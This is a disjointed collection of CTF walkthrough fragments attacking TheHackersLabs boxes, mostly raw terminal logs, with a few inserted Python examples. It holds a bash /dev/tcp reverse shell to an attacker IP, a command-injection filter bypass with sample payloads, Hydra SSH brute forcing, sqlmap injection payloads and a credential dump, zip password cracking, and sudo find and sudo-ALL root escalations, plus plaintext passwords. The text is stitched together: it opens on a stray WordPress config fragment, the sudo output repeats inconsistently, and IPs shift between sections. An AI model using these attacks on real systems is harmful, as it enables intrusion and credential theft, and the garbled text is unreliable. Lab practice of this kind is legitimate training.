if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
(base) yolo@yolo:~$ mysql -h 10.161.177.114 -P 3306 -u root -pafdvasgvfdsabdgvs6a9vd8sv Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 143271 Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> use Torrijas; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Database changed MariaDB [Torrijas]> show tables; +--------------------+ | Tables_in_Torrijas | +--------------------+ | primo | +--------------------+ 1 row in set (0.002 sec)
MariaDB [Torrijas]> select * from primo; +----+---------+----------------+ | id | usuario | contraseña | +----+---------+----------------+ | 1 | primo | queazeshurmano | +----+---------+----------------+ 1 row in set (0.003 sec)
Then you can SSH straight in; privilege escalation is not hard.
(base) yolo@yolo:~$ ssh primo@10.161.177.114 primo@10.161.177.114's password: Linux Torrija-TheHackersLabs 6.1.0-26-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.112-1 (2024-09-30) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Feb 13 17:21:05 2025 from 192.168.18.204 primo@Torrija-TheHackersLabs:~$ sudo -l sudo: unable to resolve host Torrija-TheHackersLabs: Nombre o servicio desconocido Matching Defaults entries for primo on Torrija-TheHackersLabs: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty User primo may run the following commands on Torrija-TheHackersLabs: (root) NOPASSWD: /usr/bin/bpftrace
primo@Torrija-TheHackersLabs:~$ sudo -l sudo: unable to resolve host Torrija-TheHackersLabs: Nombre o servicio desconocido Matching Defaults entries for primo on Torrija-TheHackersLabs: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User primo may run the following commands on Torrija-TheHackersLabs: (root) NOPASSWD: /usr/bin/bpftrace (ALL) NOPASSWD: ALL primo@Torrija-TheHackersLabs:~$ sudo su sudo: unable to resolve host Torrija-TheHackersLabs: Nombre o servicio desconocido root@Torrija-TheHackersLabs:/home/primo# id uid=0(root) gid=0(root) grupos=0(root) root@Torrija-TheHackersLabs:/home/primo# whoami root
(base) yolo@yolo:~$ nmap -sV -Pn 10.161.186.4 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-23 15:10 CST Nmap scan report for 10.161.186.4 Host is up (0.81s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.62 Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.47 seconds (base) yolo@yolo:~$ curl http://10.161.186.4 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://casapaco.thl">here</a>.</p> <hr> <address>Apache/2.4.62 (Debian) Server at 10.161.186.4 Port 80</address> </body></html>
// Filter to block simple commands
$pattern_blacklist = '/\b(whoami|ls|pwd|cat|sh|bash)\b/i';
if (preg_match($pattern_blacklist, $dish)) {
    die('<p style="color: red;">Error: Pide comida no intentes hackearme. Los callos estan muy ricos.</p>');
}

// Allow only these characters and "more complex" command structures
$allowed_pattern = '/^[a-zA-Z0-9\s\$\(\)\-\_\.\|]*$/';
if (!preg_match($allowed_pattern, $dish)) {
    die('<p style="color: red;">Error: Pide comida no intentes hackearme. Los callos estan muy ricos.</p>');
}
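The two checks above are a blacklist of six command names plus a character allowlist that still permits `$`, `(`, `)` and `|`, which is exactly what command substitution needs. The following Python is an added example, not code from the box or from this writeup: it mirrors both regexes, feeds them constructed payloads, and shows that `$(echo …)` rebuilds a blocked word only after the filter has already approved the string. The page does not show how `$dish` reaches the shell, so the small `$(echo X)` expander here stands in for that step; the fixed menu in the hardened variant is likewise constructed.

```python
import re

# Both regexes are transcribed from the target's PHP filter; Python's `re` treats
# these constructs (\b, \s, character class, case-insensitive flag) the same way PCRE does.
BLACKLIST = re.compile(r"\b(whoami|ls|pwd|cat|sh|bash)\b", re.IGNORECASE)
ALLOWED = re.compile(r"^[a-zA-Z0-9\s$()\-_.|]*$")


def php_filter_accepts(dish: str) -> bool:
    """Mirror of the vulnerable filter: True means the raw string goes on to the shell."""
    if BLACKLIST.search(dish):
        return False
    return ALLOWED.match(dish) is not None


# Toy model of the one shell feature the payloads below rely on: `$(echo X)` -> `X`.
# A real shell does much more; this is just enough to show why the blacklist is too late.
ECHO_SUBST = re.compile(r"\$\(echo ([^)]*)\)")


def expand_echo_substitutions(s: str) -> str:
    return ECHO_SUBST.sub(r"\1", s)


def bypasses_filter(payload: str) -> bool:
    """True when the filter accepts the payload AND the shell turns it into a blacklisted word."""
    if not php_filter_accepts(payload):
        return False
    return BLACKLIST.search(expand_echo_substitutions(payload)) is not None


# Hardened replacement: the only acceptable inputs are menu items, compared exactly.
# Nothing user-controlled is ever handed to a shell, so no regex is needed at all.
MENU = {"callos", "paella", "tortilla"}  # constructed menu


def hardened_accepts(dish: str) -> bool:
    return dish in MENU


# Constructed payloads: benign order, direct attempts, substitution bypasses, rejected characters.
PAYLOADS = [
    "callos",
    "whoami",
    "CAT flag.txt",
    "c'a't",
    "id",                          # not on the blacklist at all
    "c$(echo a)t flag.txt",        # becomes `cat flag.txt` after substitution
    "wh$(echo o)ami",              # becomes `whoami`
    "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1",  # both checks reject this form
]


def filter_report(payloads=PAYLOADS):
    """Return (payload, accepted_by_php_filter, becomes_blacklisted_word, accepted_by_hardened)."""
    return [
        (p, php_filter_accepts(p), bypasses_filter(p), hardened_accepts(p))
        for p in payloads
    ]


if __name__ == "__main__":
    for payload, accepted, bypass, hardened in filter_report():
        print(f"{payload!r:45} filter={accepted!s:5} bypass={bypass!s:5} hardened={hardened}")
```

The report shows the two failure modes side by side: `id` passes because the blacklist only lists six names, and `c$(echo a)t flag.txt` passes because the blacklist runs on the pre-expansion string. Neither gets past an exact-match allowlist.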
# Generate an activity log
bash -i >& /dev/tcp/10.161.185.232/4444 0>&1
Then open a new terminal and wait for the reverse shell.
┌──(kali㉿kali)-[~] └─$ nc -lvnp 4444 listening on [any] 4444 ... connect to [10.161.185.232] from (UNKNOWN) [10.161.186.4] 35970 bash: no se puede establecer el grupo de proceso de terminal (1496): Función ioctl no apropiada para el dispositivo bash: no hay control de trabajos en este shell root@Thehackerslabs-CasaPaco:~# id id uid=0(root) gid=0(root) grupos=0(root)
(base) yolo@yolo:~/Desktop/timu/test$ nmap -sV -Pn 10.161.189.31 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-23 21:33 CST Nmap scan report for 10.161.189.31 Host is up (0.68s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.24.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds
(base) yolo@yolo:~/Desktop/timu/test$ dirsearch -u http://10.161.189.31/ /home/yolo/.pyenv/versions/3.13.1/lib/python3.13/site-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. from pkg_resources import DistributionNotFound, VersionConflict
(base) yolo@yolo:~/Desktop/timu/test$ hydra -l superadministrator -P /snap/seclists/rockyou.txt ssh://10.161.189.31 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-11-23 21:48:24 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task [DATA] attacking ssh://10.161.189.31:22/ [22][ssh] host: 10.161.189.31 login: superadministrator password: princesa 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 2 final worker threads did not complete until end. [ERROR] 2 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-23 21:49:21 (base) yolo@yolo:~/Desktop/timu/test$ ssh superadministrator@10.161.189.31 The authenticity of host '10.161.189.31 (10.161.189.31)' can't be established. ED25519 key fingerprint is SHA256:FGZRACBwhyqZdv6wvuqfoIz1l1eoneHbjQfxlQPQz0o. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.161.189.31' (ED25519) to the list of known hosts. superadministrator@10.161.189.31's password: Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.8.0-51-generic x86_64)
System information as of Sun Nov 23 01:51:43 PM UTC 2025
System load: 0.15 Usage of /: 14.1% of 49.21GB Memory usage: 7% Swap usage: 0% Processes: 170 Users logged in: 0 IPv4 address for enp0s3: 10.161.189.31 IPv6 address for enp0s3: 2001:da8:1032:6004::3a1
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s just raised the bar for easy, resilient and secure K8s cluster deployment.
Expanded Security Maintenance for Applications is not enabled.
1 update can be applied immediately. To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Jan 10 17:42:22 2025 from 192.168.1.38 superadministrator@thehackerslabs-bocatacalamares:~$ cd superadministrator@thehackerslabs-bocatacalamares:~$ ls flag.txt recordatorio.txt superadministrator@thehackerslabs-bocatacalamares:~$ cat flag.txt c3Vkby?????? superadministrator@thehackerslabs-bocatacalamares:~$ cat recordatorio.txt Me han dicho que existe una pagina llamada gtfobins muy util para ctfs, la dejo aquí apuntada para recordarlo mas adelante.
That last line tells me to look at the GTFOBins site; I use it a lot, and plenty of sudo privilege-escalation cases can be found there.
superadministrator@thehackerslabs-bocatacalamares:~$ sudo -l Matching Defaults entries for superadministrator on thehackerslabs-bocatacalamares: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User superadministrator may run the following commands on thehackerslabs-bocatacalamares: (ALL) NOPASSWD: /usr/bin/find superadministrator@thehackerslabs-bocatacalamares:~$ sudo /usr/bin/find . -exec /bin/sh \; -quit # id uid=0(root) gid=0(root) groups=0(root)
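Three of the boxes in this writeup fall to a single `sudo -l` entry: a user-editable script under /opt for vivian, bpftrace for primo, and find for superadministrator, the last two straight out of GTFOBins. The Python below is an added example, not part of the writeup: it parses `sudo -l` output of the kind quoted above into run-as user, tags and command, and flags the three patterns worth checking first, namely `ALL`, a binary with a documented GTFOBins sudo shell escape, and a command living outside the system bin directories or writable by the current user. The GTFOBins set is a small constructed subset of the real list, and the writability probe is injectable so the page's three samples can be assessed offline.

```python
import os
import re
from pathlib import PurePosixPath

# Sample input: the rule sections of the three `sudo -l` outputs quoted in this writeup.
SUDO_L_SAMPLES = {
    "vivian": """User vivian may run the following commands on TheHackersLabs-facultad:
    (ALL) NOPASSWD: /opt/vivian/script.sh""",
    "primo": """User primo may run the following commands on Torrija-TheHackersLabs:
    (root) NOPASSWD: /usr/bin/bpftrace
    (ALL) NOPASSWD: ALL""",
    "superadministrator": """User superadministrator may run the following commands on thehackerslabs-bocatacalamares:
    (ALL) NOPASSWD: /usr/bin/find""",
}

# Constructed subset of binaries whose GTFOBins page has a "Sudo" section; the real list is far longer.
GTFOBINS_SUDO_SHELL = {"find", "bpftrace", "vim", "nano", "less", "awk", "python3", "env", "bash"}

SYSTEM_DIRS = {"/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin", "/usr/local/sbin"}

# Matches rule lines "(runas) TAG: TAG: /path/cmd args, /other/cmd"; header and Defaults lines do not.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")


def parse_sudo_l(text: str):
    """Return a list of (runas_user, tags, command) tuples, one per command in the output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()  # "(ALL : ALL)" -> "ALL"
        tags = {t for t in re.split(r":\s*", m.group("tags")) if t}
        for cmd in re.split(r",\s*", m.group("cmds")):
            rules.append((runas, tags, cmd.strip()))
    return rules


def default_is_writable(path: str) -> bool:
    """Live probe for use on the target; tests swap in a fake so they run offline."""
    return os.access(path, os.W_OK)


def assess_rules(rules, is_writable=default_is_writable):
    """Return [(runas, command, [reasons])] for every rule that deserves a closer look."""
    findings = []
    for runas, tags, cmd in rules:
        reasons = []
        if cmd == "ALL":
            reasons.append(f"unrestricted: any command as {runas}")
        else:
            binary = cmd.split()[0]
            path = PurePosixPath(binary)
            if path.name in GTFOBINS_SUDO_SHELL:
                reasons.append(f"{path.name}: documented sudo shell escape on GTFOBins")
            if str(path.parent) not in SYSTEM_DIRS:
                reasons.append("outside the system bin dirs: check ownership of the file and its directory")
            if is_writable(binary):
                reasons.append("target file is writable by the current user: edit it, then sudo it")
        if reasons and "NOPASSWD" in tags:
            reasons.append("no password required")
        if reasons:
            findings.append((runas, cmd, reasons))
    return findings


if __name__ == "__main__":
    # Offline run over the page's samples: only vivian's script is treated as writable,
    # which is what the writeup relied on (nano, then sudo).
    probe = lambda p: p == "/opt/vivian/script.sh"
    for user, output in SUDO_L_SAMPLES.items():
        for runas, cmd, reasons in assess_rules(parse_sudo_l(output), is_writable=probe):
            print(f"[{user}] ({runas}) {cmd}")
            for r in reasons:
                print(f"    - {r}")
```

On a real host drop the `is_writable` override so `os.access` does the probing; the parser deliberately ignores the `Matching Defaults entries` block, though `secure_path` and `env_reset` there are worth reading by eye since they decide whether PATH or LD_PRELOAD tricks are on the table.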
(base) yolo@yolo:~$ nmap -sV -Pn 10.161.189.183 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-23 23:03 CST Nmap scan report for 10.161.189.183 Host is up (0.78s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) 2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.45 seconds
(base) yolo@yolo:~$ dirsearch -u http://10.161.189.183/ /home/yolo/.pyenv/versions/3.13.1/lib/python3.13/site-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81. from pkg_resources import DistributionNotFound, VersionConflict
Task Completed (base) yolo@yolo:~$ nmap -A -p 2222 10.161.189.183 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-23 23:06 CST Nmap scan report for 10.161.189.183 Host is up (0.0013s latency).
PORT STATE SERVICE VERSION 2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 da:58:27:97:82:a0:b0:c5:96:bc:69:7d:05:a0:c9:34 (RSA) | 256 fd:ce:34:44:25:fe:ee:6b:89:46:2d:05:eb:dc:86:f1 (ECDSA) |_ 256 7f:19:1b:7a:ba:aa:4f:65:62:f1:51:cf:89:c6:e7:b3 (ED25519) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1.01 seconds
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 18:12:08 /2025-11-24/ [18:12:08] [INFO] resuming back-end DBMS 'mysql' [18:12:08] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 2983=2983 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 1380 FROM (SELECT(SLEEP(5)))Hcia) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: id=-9251 UNION ALL SELECT CONCAT(0x71716b7871,0x65586f65506d4d50494b7349624d6255474f4b63564d557067455978414f554b625167536f4c7662,0x716b717a71),NULL,NULL-- - --- [18:12:08] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (focal or eoan) web application technology: Apache 2.4.41 back-end DBMS: MySQL >= 5.0.12 [18:12:08] [INFO] fetched data logged to text files under '/home/yolo/.local/share/sqlmap/output/10.161.197.250' [18:12:08] [WARNING] your sqlmap version is outdated [*] ending @ 18:12:08 /2025-11-24/
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:15:24 /2025-11-24/

[18:15:24] [INFO] resuming back-end DBMS 'mysql'
[18:15:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2983=2983

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 1380 FROM (SELECT(SLEEP(5)))Hcia)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-9251 UNION ALL SELECT CONCAT(0x71716b7871,0x65586f65506d4d50494b7349624d6255474f4b63564d557067455978414f554b625167536f4c7662,0x716b717a71),NULL,NULL-- -
---
[18:15:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[18:15:24] [INFO] fetching columns for table 'users' in database 'blog'
[18:15:24] [INFO] fetching entries for table 'users' in database 'blog'
[18:15:24] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[18:15:26] [INFO] using hash method 'sha256_generic_passwd'
[18:15:26] [INFO] resuming password 'runner' for hash '527aa9f431539da8e151d5434d1d5e611d973f601d8e970790882624554146b0' for user 'david'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[18:15:27] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[18:15:28] [INFO] starting dictionary-based cracking (sha256_generic_passwd)
[18:15:28] [INFO] starting 4 processes
Database: blog
Table: users
[3 entries]
+----+---------------------------------------------------------------------------+----------+
| id | password                                                                  | username |
+----+---------------------------------------------------------------------------+----------+
| 1  | 527aa9f431539da8e151d5434d1d5e611d973f601d8e970790882624554146b0 (runner) | david    |
| 2  | 7927e941a969cdf471354e79b7ae29ae25ca04d59f66d6c19f9c43a9367ec498          | maria    |
| 3  | febb36d29baf28da1a00cad0cc6937d49f13738ff9dd88276e7c85920d2bff40          | ian      |
+----+---------------------------------------------------------------------------+----------+

[18:15:32] [INFO] table 'blog.users' dumped to CSV file '/home/yolo/.local/share/sqlmap/output/10.161.197.250/dump/blog/users.csv'
[18:15:32] [INFO] fetched data logged to text files under '/home/yolo/.local/share/sqlmap/output/10.161.197.250'
[18:15:32] [WARNING] your sqlmap version is outdated

[*] ending @ 18:15:32 /2025-11-24/
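The dump above shows why a single unsalted SHA-256 per password (the scheme sqlmap labels sha256_generic_passwd) falls to a plain wordlist, and why the TODO item "cifrar las contraseñas" was not really done. As an added example, not code from the write-up or from the target application, here is that weak scheme beside a salted PBKDF2 replacement with a constant-time verifier and a small audit helper; the PBKDF2_ROUNDS value and the sample user 'bob' are assumptions.

```python
import base64
import hashlib
import hmac
import os

PBKDF2_ROUNDS = 600_000  # assumed work factor; tune to ~100 ms per hash on the real server


def legacy_sha256(password):
    """The scheme sqlmap labelled sha256_generic_passwd: one unsalted SHA-256, hex encoded.
    Equal passwords give equal hashes, and one dictionary pass covers every user at once."""
    return hashlib.sha256(password.encode()).hexdigest()


def pbkdf2_hash(password, salt=None):
    """Salted, iterated replacement, stored as 'pbkdf2_sha256$rounds$salt$digest'."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        PBKDF2_ROUNDS, base64.b64encode(salt).decode(), base64.b64encode(digest).decode())


def verify(password, stored):
    """Constant-time check of a password against a pbkdf2_hash() record.
    Anything that is not such a record (e.g. a bare legacy hex digest) is rejected."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    _, rounds, salt_b64, digest_b64 = parts
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    base64.b64decode(salt_b64), int(rounds))
    return hmac.compare_digest(candidate, base64.b64decode(digest_b64))


def shared_passwords(rows):
    """Audit helper for the legacy table: users whose unsalted hashes collide share a
    password, which is visible without cracking anything."""
    by_hash = {}
    for user, digest in rows:
        by_hash.setdefault(digest, []).append(user)
    return [users for users in by_hash.values() if len(users) > 1]


if __name__ == "__main__":
    # Constructed rows: 'runner' and 'iambatman' come from the write-up, 'bob' is made up.
    rows = [("david", legacy_sha256("runner")),
            ("ian", legacy_sha256("iambatman")),
            ("bob", legacy_sha256("iambatman"))]
    print("password reuse in legacy table:", shared_passwords(rows))
    record = pbkdf2_hash("iambatman")
    print(record, verify("iambatman", record), verify("wrong", record))
```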
(base) yolo@yolo:~$ ssh david@10.161.197.250 -p 2222
The authenticity of host '[10.161.197.250]:2222 ([10.161.197.250]:2222)' can't be established.
ED25519 key fingerprint is SHA256:0PpHfqtGNxbHeILNpRebyOVMei8/5L6vgtwoUePOZOM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.161.197.250]:2222' (ED25519) to the list of known hosts.
david@10.161.197.250's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 6.8.0-49-generic x86_64)

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Sun Nov 23 15:13:14 2025 from 10.161.155.145
david@30acf6ca1fb6:~$ id
uid=1000(david) gid=1000(david) groups=1000(david)
(base) yolo@yolo:~/Desktop/timu/test$ zip2john credenciales.zip > ziphash
ver 2.0 efh 5455 efh 7875 credenciales.zip/credenciales.xlsx PKZIP Encr: TS_chk, cmplen=4728, decmplen=5346, crc=BA8EA891 ts=7424 cs=7424 type=8
Note: It is normal for some outputs to be very large
(base) yolo@yolo:~/Desktop/timu/test$ john ziphash --wordlist=/snap/seclists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Cracked 1 password hash (is in /home/yolo/Desktop/tools/john/run/john.pot), use "--show"
No password hashes left to crack (see FAQ)
(base) yolo@yolo:~/Desktop/timu/test$ john ziphash --show
credenciales.zip/credenciales.xlsx:rockandroll:credenciales.xlsx:credenciales.zip::credenciales.zip

1 password hash cracked, 0 left
In my case I had already cracked it the night before, so I just used --show to display the result; after decrypting the archive I obtained another user's credentials.
david@30acf6ca1fb6:~$ su maria
Password:
maria@30acf6ca1fb6:/home/david$ id
uid=1001(maria) gid=1001(maria) groups=1001(maria)
maria@30acf6ca1fb6:/home/david$ cd
maria@30acf6ca1fb6:~$ ls
maria@30acf6ca1fb6:~$ ls -la
total 36
drwxr-xr-x 3 maria maria 4096 Nov 23 15:29 .
drwxr-xr-x 1 root  root  4096 Nov 28  2024 ..
lrwxrwxrwx 1 root  root     9 Nov 28  2024 .bash_history -> /dev/null
-rw-r--r-- 1 maria maria  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 maria maria 3771 Feb 25  2020 .bashrc
drwx------ 2 maria maria 4096 Nov 28  2024 .cache
-rw------- 1 root  maria   97 Nov 23 15:29 .mysql_history
-rw-r--r-- 1 maria maria  807 Feb 25  2020 .profile
-rw-rw-r-- 1 maria maria    0 Dec  2  2024 .selected_editor
-rw------- 1 maria maria 5145 Nov 23 15:22 .viminfo
maria@30acf6ca1fb6:~$ cat .viminfo
# This viminfo file was generated by Vim 8.1.
# You may edit it if you're careful!
# Viminfo version |1,4
# Value of 'encoding' when this file was written *encoding=latin1
# hlsearch on (H) or off (h):
~h

# Command Line History (newest to oldest):
:q
|2,0,1763911325,,"q"
:q!
|2,0,1733154665,,"q!"
:wq
|2,0,1732826222,,"wq"
# Search String History (newest to oldest):
# Expression History (newest to oldest):
# Input Line History (newest to oldest):
# Debug Line History (newest to oldest):
# Registers:
""1	LINE	0
	# Directorio donde se almacenará el backup
|3,1,1,1,1,0,1732815719,"# Directorio donde se almacenará el backup"
"2	LINE	0
	asd:
|3,0,2,1,1,0,1732815718,"asd:"

# File marks:
'0  30  0  /opt/scripts/backup.sh
|4,48,30,0,1763911325,"/opt/scripts/backup.sh"
'1  1  0  /start.sh
|4,49,1,0,1733154665,"/start.sh"
'2  1  0  /tmp/crontab.PxMFFK/crontab
|4,50,1,0,1733153515,"/tmp/crontab.PxMFFK/crontab"
'3  3  18  /opt/scripts/backup.sh
|4,51,3,18,1732826222,"/opt/scripts/backup.sh"
'4  3  18  /opt/scripts/backup.sh
|4,52,3,18,1732826222,"/opt/scripts/backup.sh"
'5  2  0  /opt/scripts/backup.sh
|4,53,2,0,1732815724,"/opt/scripts/backup.sh"
'6  2  0  /opt/scripts/backup.sh
|4,54,2,0,1732815724,"/opt/scripts/backup.sh"
'7  2  0  /opt/scripts/backup.sh
|4,55,2,0,1732815724,"/opt/scripts/backup.sh"
...... some repeated entries omitted ......
|4,39,1,0,1732815706,"/opt/scripts/backup.sh"

# History of marks within files (newest to oldest):

> /opt/scripts/backup.sh
	*	1763911323	0
	"	30	0
	^	3	19
	.	3	18
	+	2	0
	+	32	0
	+	3	0
	+	3	18
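The .viminfo above is what gave away /opt/scripts/backup.sh and the crontab edit, so a leftover or readable viminfo is worth auditing on any shared host. As an added example, not part of the original write-up, a small parser that pulls the ex-command history, register contents and file-mark paths out of a viminfo file; the sample embedded in the code is reconstructed from the entries above, with the line breaks and tabs that the flattened listing lost assumed.

```python
import re

# Constructed sample: the .viminfo entries shown above, with the line breaks and the
# tab before register contents that the flattened listing lost (an assumption).
SAMPLE_VIMINFO = """\
# Command Line History (newest to oldest):
:q
|2,0,1763911325,,"q"
:q!
|2,0,1733154665,,"q!"
:wq
|2,0,1732826222,,"wq"
# Registers:
""1\tLINE\t0
\t# Directorio donde se almacenará el backup
|3,1,1,1,1,0,1732815719,"# Directorio donde se almacenará el backup"
"2\tLINE\t0
\tasd:
|3,0,2,1,1,0,1732815718,"asd:"
# File marks:
'0  30  0  /opt/scripts/backup.sh
|4,48,30,0,1763911325,"/opt/scripts/backup.sh"
'2  1  0  /tmp/crontab.PxMFFK/crontab
|4,50,1,0,1733153515,"/tmp/crontab.PxMFFK/crontab"
# History of marks within files (newest to oldest):
> /opt/scripts/backup.sh
"""

REG_RE = re.compile(r'^"{1,2}(\S)\s+(?:LINE|CHAR|BLOCK)\s')  # "2 LINE 0, or ""1 for the unnamed one
MARK_RE = re.compile(r"^'(\S)\s+\d+\s+\d+\s+(\S+)")          # '0  30  0  /path

def parse_viminfo(text):
    """Return the activity a viminfo file leaks: ex commands, yanked text, edited file paths."""
    out = {"cmd_history": [], "registers": {}, "file_marks": {}, "jump_files": []}
    reg = None
    for line in text.splitlines():
        if line.startswith(":"):                       # ex command history entry
            out["cmd_history"].append(line[1:])
        elif (m := REG_RE.match(line)):                # register header; name follows the quote(s)
            reg = m.group(1)
        elif line.startswith("|3,") and reg:           # bar line that carries the register text
            out["registers"][reg] = line.split(',"', 1)[1].rstrip('"')
            reg = None
        elif (m := MARK_RE.match(line)):               # '0-'9 marks: the last files edited
            out["file_marks"][m.group(1)] = m.group(2)
        elif line.startswith("> "):                    # per-file mark history, one path per block
            out["jump_files"].append(line[2:].strip())
    return out
```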
maria@30acf6ca1fb6:~$ ls /tmp
